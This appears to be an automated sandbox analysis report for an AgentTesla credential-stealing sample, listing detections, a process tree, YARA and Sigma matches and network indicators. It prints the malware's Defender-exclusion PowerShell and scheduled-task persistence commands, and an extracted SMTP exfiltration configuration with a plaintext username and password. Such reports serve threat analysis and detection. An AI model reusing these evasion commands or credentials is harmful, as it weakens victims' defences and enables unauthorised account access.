Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1571207
MD5:f76de5e39251d01e3fae90cc04705f71
SHA1:8b9961ead051db17a56cc67f39760220217c2839
SHA256:550396bef4076d1d9819ab7bc40f61b6ecf0af88fc68869a5aabd0d88f084005
Tags:exeuser-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F76DE5E39251D01E3FAE90CC04705F71)
    • powershell.exe (PID: 7704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NnXVkDOvj.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7944 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpD1A2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • file.exe (PID: 8128 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F76DE5E39251D01E3FAE90CC04705F71)
    • file.exe (PID: 8136 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F76DE5E39251D01E3FAE90CC04705F71)
    • file.exe (PID: 8144 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F76DE5E39251D01E3FAE90CC04705F71)
  • NnXVkDOvj.exe (PID: 7188 cmdline: C:\Users\user\AppData\Roaming\NnXVkDOvj.exe MD5: F76DE5E39251D01E3FAE90CC04705F71)
    • schtasks.exe (PID: 2816 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpE3F1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • NnXVkDOvj.exe (PID: 2832 cmdline: "C:\Users\user\AppData\Roaming\NnXVkDOvj.exe" MD5: F76DE5E39251D01E3FAE90CC04705F71)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "segreteria@casaloft.ml", "Password": "graceofgod@amen", "Host": "smtp.yandex.com"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1410116787.0000000004099000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
    00000000.00000002.1410116787.0000000004099000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.1410116787.0000000004099000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x31c10:$a3: MailAccountConfiguration
      • 0x31c29:$a5: SmtpAccountConfiguration
      • 0x31bf0:$a8: set_BindingAccountConfiguration
      • 0x30b59:$a11: get_securityProfile
      • 0x309fa:$a12: get_useSeparateFolderTree
      • 0x32353:$a13: get_DnsResolver
      • 0x30e09:$a14: get_archivingScope
      • 0x30c31:$a15: get_providerName
      • 0x3333e:$a17: get_priority
      • 0x32912:$a18: get_advancedParameters
      • 0x31d2a:$a19: get_disabledByRestriction
      • 0x307d0:$a20: get_LastAccessed
      • 0x30ea3:$a21: get_avatarType
      • 0x32a29:$a22: get_signaturePresets
      • 0x314cf:$a23: get_enableLog
      • 0x30cae:$a26: set_accountName
      • 0x32e74:$a27: set_InternalServerPort
      • 0x3015b:$a28: set_bindingConfigurationUID
      • 0x329ef:$a29: set_IdnAddress
      • 0x331f2:$a30: set_GuidMasterKey
      • 0x30d09:$a31: set_username
      0000000C.00000002.3811121653.0000000000433000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0xa0:$a3: MailAccountConfiguration
      • 0xb9:$a5: SmtpAccountConfiguration
      • 0x80:$a8: set_BindingAccountConfiguration
      • 0x7e3:$a13: get_DnsResolver
      • 0xda2:$a18: get_advancedParameters
      • 0x1ba:$a19: get_disabledByRestriction
      • 0xeb9:$a22: get_signaturePresets
      • 0xe7f:$a29: set_IdnAddress
      • 0x34d:$a35: get_ShiftKeyDown
      • 0x35e:$a36: get_AltKeyDown
      • 0xc1a:$a39: get_DefaultCredentials
      00000010.00000002.3811125875.0000000000430000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x1fe9:$a11: get_securityProfile
      • 0x1e8a:$a12: get_useSeparateFolderTree
      • 0x2299:$a14: get_archivingScope
      • 0x20c1:$a15: get_providerName
      • 0x1c60:$a20: get_LastAccessed
      • 0x2333:$a21: get_avatarType
      • 0x295f:$a23: get_enableLog
      • 0x213e:$a26: set_accountName
      • 0x15eb:$a28: set_bindingConfigurationUID
      • 0x2199:$a31: set_username
      • 0x2fc6:$a32: set_version
      • 0x1d4e:$a33: get_Clipboard
      • 0x1d5c:$a34: get_Keyboard
      • 0x1d69:$a37: get_Password
      • 0x29b0:$a38: get_PasswordHash
      Click to see the 21 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      12.2.file.exe.400000.0.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x312a0:$a3: MailAccountConfiguration
      • 0x312b9:$a5: SmtpAccountConfiguration
      • 0x31280:$a8: set_BindingAccountConfiguration
      • 0x319e3:$a13: get_DnsResolver
      • 0x31fa2:$a18: get_advancedParameters
      • 0x313ba:$a19: get_disabledByRestriction
      • 0x320b9:$a22: get_signaturePresets
      • 0x3207f:$a29: set_IdnAddress
      • 0x3154d:$a35: get_ShiftKeyDown
      • 0x3155e:$a36: get_AltKeyDown
      • 0x31e1a:$a39: get_DefaultCredentials
      0.2.file.exe.4099970.5.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        0.2.file.exe.4099970.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0.2.file.exe.4099970.5.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
          • 0x2f4a0:$a3: MailAccountConfiguration
          • 0x2f4b9:$a5: SmtpAccountConfiguration
          • 0x2f480:$a8: set_BindingAccountConfiguration
          • 0x2e3e9:$a11: get_securityProfile
          • 0x2e28a:$a12: get_useSeparateFolderTree
          • 0x2fbe3:$a13: get_DnsResolver
          • 0x2e699:$a14: get_archivingScope
          • 0x2e4c1:$a15: get_providerName
          • 0x30bce:$a17: get_priority
          • 0x301a2:$a18: get_advancedParameters
          • 0x2f5ba:$a19: get_disabledByRestriction
          • 0x2e060:$a20: get_LastAccessed
          • 0x2e733:$a21: get_avatarType
          • 0x302b9:$a22: get_signaturePresets
          • 0x2ed5f:$a23: get_enableLog
          • 0x2e53e:$a26: set_accountName
          • 0x30704:$a27: set_InternalServerPort
          • 0x2d9eb:$a28: set_bindingConfigurationUID
          • 0x3027f:$a29: set_IdnAddress
          • 0x30a82:$a30: set_GuidMasterKey
          • 0x2e599:$a31: set_username
          0.2.file.exe.4099970.5.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
          • 0x2ef5b:$s1: get_kbok
          • 0x2f88f:$s2: get_CHoo
          • 0x304ea:$s3: set_passwordIsSet
          • 0x2ed5f:$s4: get_enableLog
          • 0x33407:$s8: torbrowser
          • 0x31dea:$s10: logins
          • 0x31762:$s11: credential
          • 0x2e14e:$g1: get_Clipboard
          • 0x2e15c:$g2: get_Keyboard
          • 0x2e169:$g3: get_Password
          • 0x2f73d:$g4: get_CtrlKeyDown
          • 0x2f74d:$g5: get_ShiftKeyDown
          • 0x2f75e:$g6: get_AltKeyDown
          Click to see the 19 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7524, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", ProcessId: 7704, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7524, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", ProcessId: 7704, ProcessName: powershell.exe
          Sigma detected: Suspicious Add Scheduled Task Parent
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpE3F1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpE3F1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NnXVkDOvj.exe, ParentImage: C:\Users\user\AppData\Roaming\NnXVkDOvj.exe, ParentProcessId: 7188, ParentProcessName: NnXVkDOvj.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpE3F1.tmp", ProcessId: 2816, ProcessName: schtasks.exe
          Sigma detected: Suspicious Outbound SMTP Connections
          Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 77.88.21.158, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Users\user\Desktop\file.exe, Initiated: true, ProcessId: 8144, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49925
          Sigma detected: Suspicious Schtasks From Env Var Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpD1A2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpD1A2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7524, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpD1A2.tmp", ProcessId: 7944, ProcessName: schtasks.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7524, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe", ProcessId: 7704, ProcessName: powershell.exe

          Persistence and Installation Behavior

          barindex
          Sigma detected: Scheduled temp file as task from temp location
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpD1A2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpD1A2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7524, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpD1A2.tmp", ProcessId: 7944, ProcessName: schtasks.exe

          Suricata Signatures

          No Suricata rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 0.2.file.exe.4099970.5.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "segreteria@casaloft.ml", "Password": "graceofgod@amen", "Host": "smtp.yandex.com"}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeReversingLabs: Detection: 28%
          Multi AV Scanner detection for submitted file
          Source: file.exeReversingLabs: Detection: 28%
          Source: file.exeVirustotal: Detection: 40%Perma Link
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: file.exeJoe Sandbox ML: detected
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Networking

          barindex
          Yara detected Generic Downloader
          Source: Yara matchFile source: 0.2.file.exe.4099970.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.40d9f78.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.4176818.3.raw.unpack, type: UNPACKEDPE
          Source: global trafficTCP traffic: 192.168.2.9:49925 -> 77.88.21.158:587
          Source: Joe Sandbox ViewIP Address: 77.88.21.158 77.88.21.158
          Source: global trafficTCP traffic: 192.168.2.9:49925 -> 77.88.21.158:587
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: smtp.yandex.com
          Source: file.exe, 0000000C.00000002.3819530128.0000000003221000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNS
          Source: NnXVkDOvj.exe, 00000010.00000002.3834580704.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3834926074.0000000006126000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.gl
          Source: file.exe, 0000000C.00000002.3814289105.00000000015C9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3836582111.0000000006C70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003433000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3834975337.00000000067F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003578000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003320000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003637000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003703000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3835427129.000000000686F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3834975337.0000000006826000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003603000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000034ED000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3835665760.000000000639B000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002E6A000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3834001786.0000000006050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsrsaovsslca2018.crl0j
          Source: file.exe, 0000000C.00000002.3814289105.00000000015C9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3836582111.0000000006C70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003433000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3834975337.00000000067F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003578000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003320000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003637000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003703000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3835427129.000000000686F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003603000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000034ED000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3835665760.000000000639B000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002E6A000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3813418034.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3834001786.0000000006050000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3834926074.0000000006126000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
          Source: file.exe, 0000000C.00000002.3836582111.0000000006C70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003433000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3834975337.00000000067F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003578000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003320000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003637000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003703000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3835427129.000000000686F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3834975337.0000000006826000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003603000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3814289105.0000000001547000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000034ED000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3835665760.000000000639B000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002E6A000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3834580704.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3813418034.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3834001786.0000000006050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root.crl0G
          Source: NnXVkDOvj.exe, 00000010.00000002.3834580704.0000000006104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsigo
          Source: file.exe, 0000000C.00000002.3835427129.000000000686F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.glym
          Source: file.exe, 0000000C.00000002.3814289105.00000000015C9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3836582111.0000000006C70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003433000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3834975337.00000000067F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003578000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003320000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000033AA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003637000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003703000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3835427129.000000000686F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3834975337.0000000006826000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.0000000003603000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.3819530128.00000000034ED000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3835665760.000000000639B000.00000004.00000020.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002E6A000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3819306651.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, NnXVkDOvj.exe, 00000010.00000002.3834001786.0000000006050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsrsaovsslca20180V
